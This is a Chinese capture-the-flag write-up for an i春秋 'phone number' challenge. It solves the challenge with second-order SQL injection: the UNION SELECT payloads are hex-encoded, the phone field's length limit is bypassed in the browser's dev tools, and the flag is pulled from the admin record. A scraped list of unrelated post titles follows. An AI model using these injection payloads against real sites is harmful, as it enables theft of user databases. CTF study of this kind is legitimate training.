点开题目是一个普普通通的登录注册界面,随便注册一个点进去有两个功能,一个是查看电话和你相同的用户,一个是登出。

点击查询就可以看到用户数

这里有访问数据库的操作应该,所以就应该用数据库注入来解题。

又通过检查源码发现在查询界面存在一个提示

不多说先记下来

再尝试注册含有注入语的电话

提示请输入数字。。。。

看来这里需要输入数字那我们就使用16进制数字(hex代码)代替字符串来输入注入语

使用转码工具就可以了

先试试数据库查询操作

1 union select schema_table from information_schema.tables where schema=database()

发现他提示我的手机号为V,可能是手机号长度限制了HEX代码的传入

(第二次注册我就发现不修改这个值的话我们在注册界面手机号栏输入就只能输入11位,多了直接输入不上去)

在注册页面尝试修改源码

按F12在源码中找到长度的值,对其进行修改,我改为了99999

然后继续尝试注册输入HEX代码

再登录

成功了

再进行下一步查询操作,数据库名

1 and 1=2 union select database()

然后是表

1 union select table_name from information_schema.tables where table_schema=database()

再是列

1 union select column_name from information_schema.columns where table_name="user"

爆出一堆,但也就这三个最有可能

再联系我们之前看到的admin中存在大秘密,还用说,肯定是flag

试试访问username中的admin的信息

构造payload:1 and 1=2 union select phone from user where username="admin"

得到flag

转载于:https://www.cnblogs.com/wosun/p/11462269.html

i春秋phone number相关推荐

  1. 【苹果家庭推送】(D-U-N-S)iMessage Number是一种及时静态的企业身份标识

    推荐内容IMESSGAE相关 作者推荐内容 iMessage苹果推软件 *** 点击即可查看作者要求内容信息 作者推荐内容 1.家庭推内容 *** 点击即可查看作者要求内容信息 作者推荐内容 2.相册 ...

  2. 2022春秋杯-春季赛 勇者山峰 writeup(misc全部+web签到)

    2022春秋杯-春季赛 勇者山峰 writeup(misc全部+web签到) 改改比赛wp发上来 本文来自csdn的⭐️shu天⭐️,平时会记录ctf.取证和渗透相关的文章,欢迎大家来我的主页:shu ...

  3. re学习笔记(101)i春秋 全国大学生信息安全竞赛 计时挑战

    本文首发于 i春秋公众号 巧用Frida与Unidbg快速在CTF中解题 题目名称:计时挑战,你能当人肉计时器么? 题目下载地址:https://pan.baidu.com/s/11BcKF6LTWQ ...

  4. input属性为number,maxlength不起作用的解决方案

    <input type="text" maxlength="11" /> 效果ok, 当 <input type="number&q ...

  5. ORA-19502: write error on file xxxxx, block number xxxx

    错误现象: 在ORACLE 10g下为表空间IGNITE_EGVSQL01增加数据文件时,报如下错误: SQL> ALTER TABLESPACE IGNITE_EGVSQL01      AD ...

  6. LeetCode刷题记录10——434. Number of Segments in a String(easy)

    LeetCode刷题记录10--434. Number of Segments in a String(easy) 目录 LeetCode刷题记录9--434. Number of Segments ...

  7. HDU 1711 Number Sequence(KMP算法)

    题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=1711 Number Sequence Time Limit: 10000/5000 MS (Java/ ...

  8. LeetCode 191 Number of 1 Bits

    LeetCode 191 Number of 1 Bits 解法一(较为传统都解法):使用将n不断右移,并与1想&得到1的个数:(也有使用除法/2的,明显除法的运行效率要低于位移) 时间复杂度 ...

  9. [BuildRelease]build number / id

    build number, 也称为build id, 在build release的流程中唯一标示一个build,也是正式的产品的product version 和file version后两位(Ma ...

最新文章

  1. 独家 | 手把手教你组织数据科学项目!(附代码)
  2. 一图看懂py2/py3编码
  3. C# 声明方法关键字
  4. NLP系列学习:CRF条件随机场(2)
  5. /etc/mtab is not writable
  6. 使用GIT来管理代码的心得
  7. Alfresco安装与配置图解
  8. 面向接口编程思想(面向对象思想)
  9. markdown详细安装教程
  10. c语言小蜜蜂编程题,C语言经典题目“小蜜蜂“代码.docx
  11. 工作能力强的人,都有哪些特点?
  12. Maven从入门到精通
  13. 三星 android 4.4 kitkat 刷机包,三星 Galaxy S III LTE(i9305) 刷机包 CM11 KitKat 安卓Android4.4 非官方版...
  14. 证明求最短路径问题具有最优子结构(动态规划)
  15. python线程间通信
  16. LikeLib侧链:搭建区块链系统信任传递桥梁
  17. paypal支付对接相关问题总结
  18. Mac软件打不开的几种解决方法
  19. JAVA计算机毕业设计音乐视频分享网站Mybatis+源码+数据库+lw文档+系统+调试部署
  20. 爆牙齿的世界杯日记(八分之一之巴西区)

热门文章

  1. msi和exe文件的区别
  2. 中国四大骨干网 六大运营商 八大节点
  3. web开发门户网站建设方案
  4. 实训13 使用SQLyog创建数据库和数据表,生成E-R图——MySQL数据库
  5. 实验3数据库查询-学生表(Student)、课程表(Course)、学生选课表(SC)
  6. 一文读懂RRU关键技术
  7. 使用tushare下载指定股票日线数据并存为excel文件
  8. 支线_电子产品_00
  9. 如何在AD19中将器件清单打出
  10. 大数据的技术包括什么?